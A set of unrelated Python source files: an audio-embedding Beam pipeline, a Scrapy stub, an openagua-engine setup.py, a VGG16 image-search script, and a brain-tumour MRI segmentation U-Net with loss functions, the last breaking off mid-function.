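#   flat = ex.features.feature['embedding/trill'].float_list.value
#   emb = np.array(flat, dtype=np.float32).reshape(list(shape))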
def add_key_to_audio(ex,
audio_key,
key_field = KEY_FIELD):
"""Add hash of audio to tf.Example."""
if key_field in ex.features.feature:
raise ValueError(f'`{key_field}` is protected, can\'t be in tf.Train.')
# Compute the key.
# Note: Computing the key from the audio means keys won't be preserved when
# chunking audio.
samples = tfexample_audio_to_npfloat32(
ex, audio_key, normalize_to_pm_one=True)
samples = samples[:16000]
key = round(np.mean(samples), 5) # Round so it's stable.
key = str(key).encode('utf-8')
# Add the key to the tf.Example.
ex.features.feature[key_field].bytes_list.value.append(key)
return ex
def _add_embedding_column_map_fn(
k_v,
original_example_key,
delete_audio_from_output,
audio_key,
label_key,
speaker_id_key):
"""Combine a dictionary of named embeddings with a tf.train.Example."""
k, v_dict = k_v
if original_example_key not in v_dict:
raise ValueError(
f'Original key not found: {original_example_key} vs {v_dict.keys()}')
ex_l = v_dict[original_example_key]
assert len(ex_l) == 1, (len(ex_l), k_v[0], ex_l)
ex = copy.deepcopy(ex_l[0]) # Beam does not allow modifying the input.
assert isinstance(ex, tf.train.Example), type(ex)
for name, embedding_l in v_dict.items():
if name == original_example_key:
continue
assert len(embedding_l) == 1, embedding_l
embedding = embedding_l[0]
assert isinstance(embedding, np.ndarray)
assert embedding.ndim == 2, embedding.ndim
# Store the embedding 2D shape and store the 1D embedding. The original
# embedding can be recovered with `emb.reshape(feature['shape'])`.
ex = _add_embedding_to_tfexample(ex, embedding, f'embedding/{name}')
# Add the hash of the audio as a key.
ex = add_key_to_audio(ex, audio_key)
if delete_audio_from_output:
ex.features.feature.pop(audio_key, None)
  # Assert that the label is present. If it's an integer, convert it to bytes.
if label_key:
if label_key not in ex.features.feature:
raise ValueError(f'Label not found: {label_key} vs {ex.features.feature}')
lbl_feat = ex.features.feature[label_key]
if lbl_feat.int64_list.value:
lbl_val_as_bytes = str(lbl_feat.int64_list.value[0]).encode('utf-8')
ex.features.feature.pop(label_key, None)
ex.features.feature[label_key].bytes_list.value.append(lbl_val_as_bytes)
# If provided, assert that the speaker_id field is present, and of type
# `bytes`.
if speaker_id_key:
feats = ex.features.feature
assert speaker_id_key in feats, (speaker_id_key, feats.keys())
assert feats[speaker_id_key].bytes_list.value, feats[speaker_id_key]
return k, ex
def _tfds_filenames(dataset_name,
split_name,
data_dir = None):
"""Returns filenames for a TFDS dataset."""
data_dir = tfds.builder(dataset_name, data_dir=data_dir).data_dir
return [os.path.join(data_dir, x) for x in
tfds.builder(dataset_name).info.splits[split_name].filenames]
def _tfds_sample_rate(dataset_name, data_dir = None):
return tfds.builder(dataset_name, data_dir=data_dir).info.features[
'audio'].sample_rate
def read_input_glob_and_sample_rate_from_flags(
input_glob_flag, sample_rate_flag, tfds_dataset_flag,
output_filename_flag,
tfds_data_dir_flag):
"""Read flags for input data and sample rate.
Args:
input_glob_flag: String flag. The input file glob.
sample_rate_flag: String flag. The sample rate.
tfds_dataset_flag: String flag. The TFDS dataset.
output_filename_flag: String flag. The output filename.
tfds_data_dir_flag: String flag. Optional location of local TFDS data.
Returns:
(input_filenames, output_filenames, sample_rate)
`input_filenames` is a list of list of filenames. `output_filenames` is a
list of the same length.
"""
if input_glob_flag:
if not tf.io.gfile.glob(input_glob_flag):
raise ValueError(f'Files not found: {input_glob_flag}')
if tfds_data_dir_flag:
raise ValueError(
f'`tfds_data_dir_flag` should be None: {tfds_data_dir_flag}')
input_filenames = [tf.io.gfile.glob(input_glob_flag)]
output_filenames = [output_filename_flag]
sample_rate = int(sample_rate_flag)
else:
assert tfds_dataset_flag
dataset_name = tfds_dataset_flag
# Download dataset, if necessary.
tfds.load(dataset_name, data_dir=tfds_data_dir_flag)
sample_rate = _tfds_sample_rate(dataset_name, tfds_data_dir_flag)
if not sample_rate:
raise ValueError(f'Must have sample rate: {sample_rate}')
input_filenames = []
output_filenames = []
for split_name in ('train', 'validation', 'test'):
input_filenames.append(
_tfds_filenames(dataset_name, split_name, tfds_data_dir_flag))
output_filenames.append(output_filename_flag + f'.{split_name}')
logging.info('TFDS input filenames: %s', input_filenames)
logging.info('sample rate: %s', sample_rate)
if sample_rate and not isinstance(sample_rate, numbers.Number):
raise ValueError(f'Sample rate must be number: {type(sample_rate)}')
for filename_list in input_filenames:
for filename in filename_list:
if not tf.io.gfile.exists(filename):
raise ValueError(f'File doesn\'t exist: {filename}')
if len(input_filenames) != len(output_filenames):
raise ValueError('Lengths not equal.')
logging.info('input_filenames: %s', input_filenames)
logging.info('output_filenames: %s', output_filenames)
return input_filenames, output_filenames, sample_rate
def validate_inputs(input_filenames_list,
output_filenames, embedding_modules,
embedding_names, module_output_keys):
"""Validate inputs and input flags."""
for filename_list in input_filenames_list:
for filename in filename_list:
# It's either a filename or a glob. Try both.
try:
if not tf.io.gfile.exists(filename):
raise ValueError(f'Files not found: {filename}')
except (tf.errors.InvalidArgumentError, ValueError): # was a glob.
if not tf.io.gfile.glob(filename):
raise ValueError(f'Files not found: {filename}')
if len(input_filenames_list) != len(output_filenames):
raise ValueError('Input/output filename lengths don\'t match: '
f'{input_filenames_list} vs {output_filenames}')
# Make sure output files don't already exist.
for output_filename in output_filenames:
if tf.io.gfile.glob(f'{output_filename}*'):
raise ValueError(f'Output file already exists: {output_filename}')
# Lengths of flag lists must be the same.
if len(embedding_names) != len(embedding_modules):
raise ValueError(
f'Lengths don\'t match: {embedding_names} vs {embedding_modules}')
if len(embedding_modules) != len(module_output_keys):
raise ValueError(
f'Lengths don\'t match: {embedding_modules} vs {module_output_keys}')
# Shortnames must be unique.
if len(set(embedding_names)) != len(embedding_names):
raise ValueError(f'Shortnames must be unique: {embedding_names}')
# Create output directory if it doesn't already exist.
for output_filename in output_filenames:
output_dir = output_filename.rsplit('/', 1)[0]
if not tf.io.gfile.exists(output_dir):
tf.io.gfile.makedirs(output_dir)
def _read_from_tfrecord(root, input_filenames,
suffix):
"""Reads from a Python list of TFRecord files."""
if not isinstance(input_filenames, list):
raise ValueError(f'Expected list: {type(input_filenames)}')
return (root
| f'MakeFilenames{suffix}' >> beam.Create(input_filenames)
| f'ReadTFRecords{suffix}' >> beam.io.tfrecordio.ReadAllFromTFRecord(
coder=beam.coders.ProtoCoder(tf.train.Example))
| f'AddKeys{suffix}' >> beam.Map(
lambda x: (str(random.getrandbits(128)), x)))
def _write_to_tfrecord(combined_tbl, output_filename,
suffix):
_ = (combined_tbl
| f'RemoveKey{suffix}' >> beam.Map(lambda k_v: k_v[1])
| f'Write{suffix}' >> beam.io.WriteToTFRecord(
output_filename, coder=beam.coders.ProtoCoder(tf.train.Example)))
# Possible input formats. If you want to read from a different input format,
# add your read function here. Function should take (root, input_filenames) and
# map to input_examples.
reader_functions = {
'tfrecord': _read_from_tfrecord
}
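# A new input format can be supported by registering another reader with the same
# (root, input_filenames, suffix) signature; a hypothetical sketch:
#
#   def _read_from_my_format(root, input_filenames, suffix):
#     ...  # must return a PCollection of (key, tf.train.Example) pairs
#   reader_functions['my_format'] = _read_from_my_format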
# Write output to disk.
writer_functions = {
'tfrecord': _write_to_tfrecord,
}
def make_beam_pipeline(
root,
input_filenames,
sample_rate,
debug,
embedding_names,
embedding_modules,
module_output_keys,
audio_key,
sample_rate_key,
label_key,
speaker_id_key,
average_over_time,
delete_audio_from_output,
output_filename,
split_embeddings_into_separate_tables = False,
use_frontend_fn = False,
normalize_to_pm_one = True,
model_input_min_length = None,
input_format = 'tfrecord',
output_format = 'tfrecord',
suffix = 'Main',
module_call_fn = samples_to_embedding_tfhub,
setup_fn = hub.load):
"""Construct beam pipeline for mapping from audio to embeddings.
Args:
root: The beam root node.
input_filenames: Python list. List of input files.
sample_rate: Python int, or `None`. The sample rate for all embeddings, or
`None` if this is a TFDS dataset, or if each example has its own sample
rate.
debug: Python bool. Whether to operate in debug mode.
embedding_names: Python list of embeddings.
embedding_modules: Python list of TF-Hub modules.
module_output_keys: Python list of strings, names of output modules.
audio_key: Python string, the key of the audio.
    sample_rate_key: Python string or `None`. The tf.Example field containing the sample rate.
label_key: Python string. Field for label.
speaker_id_key: Python string or `None`. Key for speaker ID, or `None`.
average_over_time: Python bool. If `True`, average over the time axis.
    delete_audio_from_output: Python bool. Whether to remove audio from
outputs.
output_filename: Python string. Output filename.
split_embeddings_into_separate_tables: Python bool. If true, write each
embedding to a separate table.
use_frontend_fn: If `true`, call frontend fn on audio before passing to the
model.
normalize_to_pm_one: Whether to normalize input to +- 1 before passing to
model.
model_input_min_length: Min length to the model, or `None`. 0-pad inputs to
this length, if necessary. Note that frontends usually contain their own
length logic, unless the model is in TFLite format.
input_format: Python string. Must correspond to a function in
`reader_functions`.
output_format: Python string. Must correspond to a function
`writer_functions`.
suffix: Python string. Suffix to stage names to make them unique.
module_call_fn: Function for inference on audio.
setup_fn: Function for creating audio inference model.
"""
tf_examples_key_ = 'tf_examples'
assert tf_examples_key_ not in embedding_names
s = suffix # for code brevity.
# Read from input.
input_examples = reader_functions[input_format](root, input_filenames, s)
# In debug mode, take one input example.
if debug:
input_examples = (
input_examples
| f'TakeOne{s}' >> beam.transforms.combiners.Sample.FixedSizeGlobally(1)
# Sampling generates lists, so flatten back into one collection.
| f'DebugFlatten{s}' >> beam.FlatMap(lambda x: x))
# Compute all the embeddings simultaneously.
embedding_tables = {}
for name, mod, out_key in zip(
embedding_names, embedding_modules, module_output_keys):
logging.info('Adding signal: %s %s, %s', name, mod, out_key)
tbl = input_examples | f'ComputeEmbedding-{name}-{s}' >> beam.ParDo(
ComputeEmbeddingMapFn(
name=name,
module=mod,
output_key=out_key,
audio_key=audio_key,
sample_rate_key=sample_rate_key,
sample_rate=sample_rate,
average_over_time=average_over_time,
feature_fn=_default_feature_fn if use_frontend_fn else None,
normalize_to_pm_one=normalize_to_pm_one,
model_input_min_length=model_input_min_length,
module_call_fn=module_call_fn,
setup_fn=setup_fn))
embedding_tables[name] = tbl
assert tf_examples_key_ not in embedding_tables
embedding_tables[tf_examples_key_] = input_examples
logging.info('embedding_tables: %s', embedding_tables)
# Either write to one table with all embeddings, or one table per embedding.
if split_embeddings_into_separate_tables:
output_table_dicts = [
(k, {k: v, tf_examples_key_: input_examples}) for
k, v in embedding_tables.items() if k != tf_examples_key_]
else:
output_table_dicts = [('all', embedding_tables)]
# Combine embeddings and tf.train.Example, using the common key.
writer_function = writer_functions[output_format]
for name, embedding_tables in output_table_dicts:
if split_embeddings_into_separate_tables:
cur_s = f'{name}-{s}'
# Add `name` as a subdir.
dirname, basename = os.path.split(output_filename)
cur_output_filename = os.path.join(dirname, name, f'{basename}@*')
else:
cur_s = s
cur_output_filename = f'{output_filename}@*'
combined_tbl = (
embedding_tables
| f'CombineEmbeddingTables-{cur_s}' >> beam.CoGroupByKey()
| f'AddEmbeddings-{cur_s}' >> beam.Map(
_add_embedding_column_map_fn,
original_example_key=tf_examples_key_,
delete_audio_from_output=delete_audio_from_output,
audio_key=audio_key,
label_key=label_key,
speaker_id_key=speaker_id_key))
logging.info('Writing to %s', cur_output_filename)
writer_function(combined_tbl, cur_output_filename, cur_s)
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
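# For example, in the project's settings.py (a sketch; the package name is an assumption):
#
#   ITEM_PIPELINES = {
#       'reelscout.pipelines.ReelscoutPipeline': 300,
#   }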
class ReelscoutPipeline(object):
def process_item(self, item, spider):
return item
|
import setuptools
VERSION = '0.2.15'
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="openagua-engine",
version=VERSION,
license="MIT",
author="David Rheinheimer",
author_email="david.rheinheimer@tec.mx",
description="Tools to connect a model engine to OpenAgua",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/openagua/openagua-engine",
packages=setuptools.find_packages(),
install_requires=["celery", "pubnub", "requests", "openagua_client", "loguru"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
import sys
import argparse
import torch
import glob
import collections
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from torchvision.models import vgg16
from torchvision import transforms
plt.rcParams["font.size"] = 16
images_db = collections.defaultdict(set)
def classify_image(img, topn = 4):
clf = vgg16(pretrained=True)
preprocess = transforms.Compose([
transforms.Resize(299),
transforms.CenterCrop(299),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),])
with open('data/imagenet_classes.txt') as f:
classes = [line.strip() for line in f.readlines()]
img_t = preprocess(img)
batch_t = torch.unsqueeze(img_t, 0)
clf.eval()
output = clf(batch_t)
_, indices = torch.sort(output, descending=True)
probabilities = torch.nn.functional.softmax(output, dim=1)
d = {'Class': [classes[idx] for idx in indices[0][:topn]],
'Probability score': [np.round(probabilities[0, idx].item(),3) for idx in indices[0][:topn]]}
df = pd.DataFrame(d, columns = ['Class','Probability score'])
return df
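# Example usage (a sketch; the image path is hypothetical, and the pretrained VGG16
# weights are downloaded on first use):
#
#   img = Image.open('data/test_images/dog.jpg')
#   print(classify_image(img, topn=3))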
def add_to_cache(image, df):
string_probability = set()
for i in range(len(df)):
class_names = df['Class'][i].split(',')
# probability = df['Probability Score'][i] # TODO: improve output sorting order
for name in class_names:
name = name.strip()
images_db[name].add(image)
for word in name.split(' '):
images_db[word.lower()].add(image)
def predict_images(dir, verbose):
# Predict labels with associated probabilities for unseen images
images = glob.glob(dir)
for image in images:
img = Image.open(image)
df = classify_image(img)
if verbose:
print(image)
print(df)
add_to_cache(image, df)
def _exit_program(event):
sys.exit()
def main():
parser = argparse.ArgumentParser(
prog='Image search',
        description='''The program uses an ML library to estimate what each image
        in the given directory could be, building a map of keywords to images at
        program startup.
        The program then takes a user keyword and outputs the images matching it ''',
epilog='''
The challenge was open ended and I figured with live DB,
having auth secrets in github wouldn't be a good idea;
and therefore went with a simple python solution.
        Currently I am studying ML and AI so was interested in
trying to apply what I am learning for the challenge.''')
parser.add_argument('--keyword', '-k', action="store", type=str, nargs='?', required=True,
help='search keyword')
parser.add_argument('--directory', '-d', action="store", default="data/test_images/*.*",
help='valid directory of where the images are located')
parser.add_argument('--verbose', '-v', action="store_true",
help='to allow verbose output')
args = parser.parse_args()
print(args)
predict_images(args.directory, args.verbose)
search_keyword = args.keyword.strip().lower()
if search_keyword in images_db:
result_size = len(images_db[search_keyword])
fig = plt.figure(figsize=(result_size, result_size))
for ind, image in enumerate(images_db[search_keyword]):
img = Image.open(image)
img.load()
fig.add_subplot(result_size//2 +1, result_size//2 +1, ind+1)
plt.imshow(img)
mng = plt.get_current_fig_manager()
mng.full_screen_toggle()
axcut = plt.axes([0.4, 0.0, 0.2, 0.075])
bcut = plt.Button(axcut, 'Exit Search Results', color='grey', hovercolor='red')
bcut.on_clicked(_exit_program)
plt.show()
else:
print("0 results found for " + search_keyword + " try "
"searching something else.")
print("Keywords for image results: " )
print(list(images_db.keys()))
if __name__ == "__main__":
main()
|
import os
import cv2
import numpy as np
import numpy
import pandas as pd
import nibabel as nib
import torch.optim as optim
import random
import torch
from torch.nn import BCELoss, NLLLoss, BCEWithLogitsLoss, MSELoss, ModuleList, ReplicationPad2d
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable, Function
from torch.utils.data.sampler import SequentialSampler
from collections import OrderedDict
from torch.autograd import Variable
import itertools
from torch.utils.data.dataset import Dataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import Sampler, RandomSampler, WeightedRandomSampler
from torch._six import int_classes as _int_classes
data_shape = 192*192
target_label_sets = [[1],
[4],
[1,3,4],
[1,2,3,4],
[1,2,3,4,5]
]
target_label_names = ['necrosis', 'contrast_enhancing', 'core', 'tumor', 'brain']
label_prevalences = [0.1]*2+[0.2]+[0.4]+[0.9]
list(zip(label_prevalences,target_label_names))
np.random.seed(13375) # for reproducibility
random.seed(133567)
def rotateImage(image, angle, interp = cv2.INTER_NEAREST):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=interp)
return result
def get_stack(axis,
volume,
gt_volume,
central_slice,
first_slice=None,
last_slice=None,
stack_depth=5,
size = (192,192),
rotate_angle = None,
rotate_axis = 0,
flipLR = False,
lower_threshold = None,
upper_threshold= None):
if (first_slice is not None or last_slice is not None) and central_slice is not None:
raise ValueError('Stack location overspecified')
if (first_slice is not None and last_slice is not None) and stack_depth is not None:
raise ValueError('Stack location overspecified')
image_data = volume
if flipLR:
image_data = image_data[:,:,::-1]
if rotate_angle is not None:
image_data = np.swapaxes(rotateImage(np.swapaxes(image_data,0,rotate_axis),rotate_angle,cv2.INTER_LINEAR)
,0,rotate_axis)
#image_data = np.swapaxes(volume, 0, axis)
image_data = np.array(np.swapaxes(image_data, 0, axis), copy = True)
mean = np.mean(image_data[image_data>0])
sd = np.sqrt(np.var(image_data[image_data>0]))
if lower_threshold is None:
lower_threshold = 0
if upper_threshold is None:
upper_threshold = np.percentile(image_data[image_data>0], 99.9)
image_data[image_data<lower_threshold]=lower_threshold
image_data[image_data>upper_threshold]=upper_threshold
if first_slice is None:
if central_slice is not None:
first_slice = central_slice - stack_depth//2
last_slice = central_slice + stack_depth//2 + 1
elif last_slice is not None:
first_slice = last_slice - stack_depth
elif last_slice is None:
last_slice = min(first_slice + stack_depth, len(image_data))
pad_up = max(0, -first_slice)
pad_down = -min(0, len(image_data)-last_slice)
first_slice = max(first_slice,0)
last_slice = min(last_slice, len(image_data))
initial_stack = image_data[first_slice:last_slice]
initial_shape = initial_stack.shape[1:]
shape_difference = (size[0] - initial_shape[0],size[1] - initial_shape[1])
pad_size = ((pad_up,pad_down),
(shape_difference[0]//2, shape_difference[0] - shape_difference[0]//2),
(shape_difference[1]//2, shape_difference[1] - shape_difference[1]//2) )
initial_stack = np.pad(initial_stack, pad_size, mode = 'constant', constant_values = lower_threshold)
nonzero_mask = (initial_stack>lower_threshold).astype(np.int)
gt = gt_volume
if flipLR:
gt = gt[:,:,::-1]
if rotate_angle is not None:
gt = np.swapaxes(rotateImage(np.swapaxes(gt,0,rotate_axis),rotate_angle),0,rotate_axis)
gt = np.swapaxes(gt, 0, axis)
gt_stack = gt[first_slice:last_slice]
gt_stack = np.pad(gt_stack, pad_size, mode = 'constant', constant_values = 0)
return (initial_stack - mean)/sd, gt_stack, nonzero_mask
def get_stack_no_augment(axis, volume, gt_volume, first_slice, last_slice,size=(192,192)):
return get_stack(axis = axis,
volume = volume,
gt_volume = gt_volume,
central_slice=None,
stack_depth=None,
first_slice = first_slice,
last_slice = last_slice,
size=size)
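# A minimal sketch of what get_stack returns, using synthetic volumes rather than real
# MRI data (and assuming the legacy numpy/PyTorch stack this file targets, e.g. np.int
# still existing): a z-scored stack of `stack_depth` slices padded to `size`, the
# matching ground-truth stack, and a mask of the originally non-background voxels.
def _demo_get_stack():
    vol = np.random.rand(32, 64, 64).astype(np.float32) + 0.1   # fake intensity volume
    gt = np.zeros((32, 64, 64), dtype=np.int32)                  # fake label volume
    stack, gt_stack, nonzero = get_stack(axis=0, volume=vol, gt_volume=gt,
                                         central_slice=16, stack_depth=5)
    print(stack.shape, gt_stack.shape, nonzero.shape)            # (5, 192, 192) each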
# ## Define the U-net variant
class GradMultiplier(Function):
def __init__(self, lambd):
self.lambd = lambd
def forward(self, x):
return x.view_as(x)
def backward(self, grad_output):
return (grad_output * self.lambd)
def grad_multiply(x, lambd):
return GradMultiplier(lambd)(x)
def reduce_3d_depth (in_channel, out_channel, kernel_size, padding):
layer = nn.Sequential(OrderedDict([
("pad1", nn.ReplicationPad3d((1,1,1,1,0,0))),
("conv1", nn.Conv3d(in_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn1", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU())
]))
return layer
def down_layer(in_channel, out_channel, kernel_size, padding):
layer = nn.Sequential(OrderedDict([
("pad1", nn.ReplicationPad2d(1)),
("conv1", nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn1", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU()),
("pad2", nn.ReplicationPad2d(1)),
("conv2", nn.Conv2d(out_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn2", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU())]))
return layer
def up_layer(in_channel, out_channel, kernel_size, padding):
layer = nn.Sequential(OrderedDict([
("pad1", nn.ReplicationPad2d(1)),
("conv1", nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn1", nn.BatchNorm2d(out_channel)),
("relu1", nn.ReLU()),
("pad2", nn.ReplicationPad2d(1)),
("conv2", nn.Conv2d(out_channel, out_channel, kernel_size=kernel_size, padding=padding)),
("bn2", nn.BatchNorm2d(out_channel)),
("relu2", nn.ReLU())]))
return layer
class DilatedDenseUnit(nn.Module):
def __init__(self, in_channel, growth_rate , kernel_size, dilation):
super(DilatedDenseUnit,self).__init__()
self.layer = nn.Sequential(OrderedDict([
("bn1", nn.BatchNorm2d(in_channel)),
("relu1", nn.ReLU()),
("pad1", nn.ReplicationPad2d(dilation)),
("conv1", nn.Conv2d(in_channel, growth_rate, kernel_size=kernel_size, dilation = dilation,padding=0))]))
def forward(self, x):
out = x
out = self.layer(out)
out = concatenate(x, out)
return out
def center_crop(layer, target_size):
_, _, layer_width, layer_height = layer.size()
start = (layer_width - target_size) // 2
crop = layer[:, :, start:(start + target_size), start:(start + target_size)]
return crop
def concatenate(link, layer):
crop = center_crop(link, layer.size()[2])
concat = torch.cat([crop, layer], 1)
return concat
def dense_atrous_bottleneck(in_channel, growth_rate = 12, depth = [4,4,4,4]):
layer_dict = OrderedDict()
for idx, growth_steps in enumerate(depth):
dilation_rate = 2**idx
for y in range(growth_steps):
layer_dict["dilated_{}_{}".format(dilation_rate,y)] = DilatedDenseUnit(in_channel,
growth_rate,
kernel_size=3,
dilation = dilation_rate)
in_channel = in_channel + growth_rate
return nn.Sequential(layer_dict), in_channel
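# Quick sanity sketch of how the dense bottleneck grows channels: with the defaults used
# by UNET_3D_to_2D below (growth_rate=12, depth=[4,4,4,4]) there are 16 dilated dense
# units, so a 128-channel input leaves with 128 + 16*12 = 320 channels; the function
# returns that count so the decoder can be sized accordingly.
def _demo_bottleneck_channels():
    bottleneck, out_channels = dense_atrous_bottleneck(128, growth_rate=12, depth=[4, 4, 4, 4])
    assert out_channels == 128 + 16 * 12
    return bottleneck, out_channels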
class UNET_3D_to_2D(nn.Module):
def __init__(self, depth, channels_in = 1,
channels_2d_to_3d=32, channels=32, output_channels = 1, slices=5,
variance_gradient_multiplier = 1,
dilated_layers = [4,4,4,4],
growth_rate = 12):
super(UNET_3D_to_2D, self).__init__()
self.main_modules = []
self.depth = depth
self.slices = slices
self.variance_gradient_multiplier = variance_gradient_multiplier
self.depth_reducing_layers = ModuleList([reduce_3d_depth(in_channel, channels_2d_to_3d, kernel_size=3, padding=0)
for in_channel in [channels_in]+[channels_2d_to_3d]*(slices//2 - 1)])
self.down1 = down_layer(in_channel=channels_2d_to_3d, out_channel=channels, kernel_size=3, padding=0)
self.main_modules.append(self.down1)
self.max1 = nn.MaxPool2d(2)
self.down_layers = ModuleList([down_layer(in_channel = channels*(2**i),
out_channel = channels * (2**(i+1)),
kernel_size = 3,
padding=0
) for i in range(self.depth)])
self.main_modules.append(self.down_layers)
self.max_layers = ModuleList([nn.MaxPool2d(2) for i in range(self.depth)])
self.bottleneck, bottleneck_features = dense_atrous_bottleneck(channels*2**self.depth, growth_rate = growth_rate,
depth = dilated_layers)
self.main_modules.append(self.bottleneck)
self.upsampling_layers = ModuleList([nn.Sequential(OrderedDict([
("upsampling",nn.Upsample(scale_factor=2, mode = 'bilinear')),
("pad", nn.ReplicationPad2d(1)),
("conv", nn.Conv2d(in_channels= bottleneck_features,
out_channels=bottleneck_features,
kernel_size=3,
padding=0))])) for i in range(self.depth, -1, -1)])
self.main_modules.append(self.upsampling_layers)
self.up_layers = ModuleList([up_layer(in_channel= bottleneck_features+ channels*(2**(i)),
out_channel=bottleneck_features,
kernel_size=3,
padding=0) for i in range(self.depth, -1, -1)])
self.main_modules.append(self.up_layers)
self.last = nn.Conv2d(in_channels=bottleneck_features, out_channels=output_channels, kernel_size=1)
self.main_modules.append(self.last)
self.logvar = nn.Conv2d(in_channels=bottleneck_features, out_channels=output_channels, kernel_size=1)
def forward(self, x):
# down
out = x
for i in range(self.slices//2):
out = self.depth_reducing_layers[i](out)
out = out.transpose(1, 2).contiguous()
size = out.size()
out = out.view((-1, size[2], size[3], size[4]))
links = []
out = self.down1(out)
links.append(out)
out = self.max1(out)
for i in range(self.depth):
out = self.down_layers[i](out)
links.append(out)
out = self.max_layers[i](out)
out = self.bottleneck(out)
links.reverse()
# up
for i in range(self.depth+1):
out = self.upsampling_layers[i](out)
out = concatenate(links[i], out)
out = self.up_layers[i](out)
pred = self.last(out)
logvar = self.logvar(out)
logvar = grad_multiply(logvar,self.variance_gradient_multiplier)
return pred, logvar
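# A minimal forward-pass sketch with dummy data (assumes the legacy PyTorch API this
# file is written against -- Variable, old-style autograd Functions, etc. -- and uses a
# made-up depth of 2 to keep it cheap). Input is (batch, modalities, slices, H, W);
# the network returns one logit map and one flip-logit map per target label set.
def _demo_unet_forward():
    net = UNET_3D_to_2D(depth=2, channels_in=4,
                        output_channels=len(target_label_sets), slices=5)
    dummy = Variable(torch.randn(1, 4, 5, 192, 192))
    pred, logvar = net(dummy)
    print(pred.size(), logvar.size())   # both (1, 5, 192, 192)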
class Average(object):
def __init__(self):
self.reset()
def reset(self):
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.sum += val
self.count += n
@property
def avg(self):
return self.sum / self.count
def torch_dice(x, y):
epsilon = 1e-4
intersection = torch.mul(x,y)
intersection_sum = intersection.sum(1).sum(1)+epsilon/2
sum_true = x.sum(1).sum(1) + epsilon
sum_pred = y.sum(1).sum(1)
return 2*intersection_sum/(sum_pred+sum_true)
def torch_dice_local(x, y, radius):
epsilon = 1e-4
intersection = torch.mul(x,y)
local_mean = nn.Conv2d(1, 1, kernel_size=radius, padding=radius//2, bias=False)
local_mean.weight = torch.nn.Parameter(torch.ones(1, 1, radius, radius).cuda()/(radius*radius))
local_intersection = local_mean(intersection.unsqueeze(1)) + epsilon
local_true = local_mean(x.unsqueeze(1)) + epsilon
local_pred = local_mean(y.unsqueeze(1))
return 2*local_intersection/(local_pred+local_true)
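# Tiny sanity sketch of the soft Dice helper on (batch, H, W) masks: identical masks
# score ~1, disjoint masks score ~0 (the epsilon terms keep the ratio finite).
def _demo_torch_dice():
    ones = torch.ones(2, 8, 8)
    print(torch_dice(ones, ones))                  # ~1.0 per batch item
    print(torch_dice(ones, torch.zeros(2, 8, 8)))  # ~0.0 per batch item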
num_epochs = 3
class BCE_from_logits(nn.modules.Module):
def __init__(self):
super(BCE_from_logits,self).__init__()
def forward(self, input, target):
#input = input.clamp(min = -1, max = 1)
max_val = (-input).clamp(min=0)
loss = input - input * target + max_val + ((-max_val).exp() + (-input - max_val).exp()).log()
return loss
class BCE_from_logits_focal(nn.modules.Module):
def __init__(self, gamma):
super(BCE_from_logits_focal,self).__init__()
self.gamma = gamma
def forward(self, input, target):
#input = input.clamp(min = -1, max = 1)
max_val = (-input).clamp(min=0)
loss = input - input * target + max_val + ((-max_val).exp() + (-input - max_val).exp()).log()
p = input.sigmoid()
pt = (1-p)*(1-target) + p*target
return ((1-pt).pow(self.gamma))*loss
val_stack_size = 50
def heteroscedastic_loss(masks, outputs, logit_flip, nonzero_mask, gamma):
criterion = BCE_from_logits()
criterion2 = BCE_from_logits_focal(gamma)
flip_prob = F.sigmoid(logit_flip)
masks_flipped = (1- masks)*flip_prob + masks * (1 - flip_prob)
false_neg = ((-outputs).sign().clamp(min=0))*masks
false_pos = outputs.sign().clamp(min=0)*(1-masks)
label_is_flipped = false_neg+false_pos
flipped_gt = nonzero_mask*label_is_flipped
loss = criterion2(outputs, masks) + criterion2(outputs, masks_flipped) + criterion2(logit_flip, flipped_gt)
loss = loss*nonzero_mask
loss = loss.mean()
return loss
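# A small CPU sketch of the call signature, with made-up tensors: per-pixel segmentation
# logits, per-pixel label-flip logits, an all-background ground truth, and an all-ones
# brain mask. The three focal-BCE terms score the raw labels, the flip-softened labels,
# and the flip predictor itself.
def _demo_heteroscedastic_loss():
    outputs = torch.randn(5, 192, 192)      # segmentation logits
    logit_flip = torch.randn(5, 192, 192)   # label-flip logits
    masks = torch.zeros(5, 192, 192)        # ground-truth labels
    nonzero = torch.ones(5, 192, 192)       # voxels inside the brain
    print(heteroscedastic_loss(masks, outputs, logit_flip, nonzero, 2))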
def apply_to_case(model, volumes, gt_volume, batch_size, variance_estimator = 'analytic', axis=0,
size=(256,256)):
model.eval()
volume_0, volume_1, volume_2, volume_3= volumes
print(volume_0.shape)
mask_total = []
logit_total = []
image_total = []
flip_total = []
loss_total = [0 for i in target_label_sets]
softmax_loss = 0
TP = np.zeros(len(target_label_sets))
FP = np.zeros(len(target_label_sets))
TN = np.zeros(len(target_label_sets))
FN = np.zeros(len(target_label_sets))
num_batches = volume_0.shape[axis]//(batch_size)
if volume_0.shape[axis]%batch_size > 0:
num_batches = num_batches + 1
class BrainDataTest(Dataset):
def __init__(self):
self.length = num_batches
# Override to give PyTorch access to any image on the dataset
def __getitem__(self, batch):
first_slice = batch*batch_size - 2
last_slice = np.min([(batch+1)*batch_size+2, volume_0.shape[axis]+2])
extra_upper_slices = np.max([0, 5 - (last_slice - first_slice)])
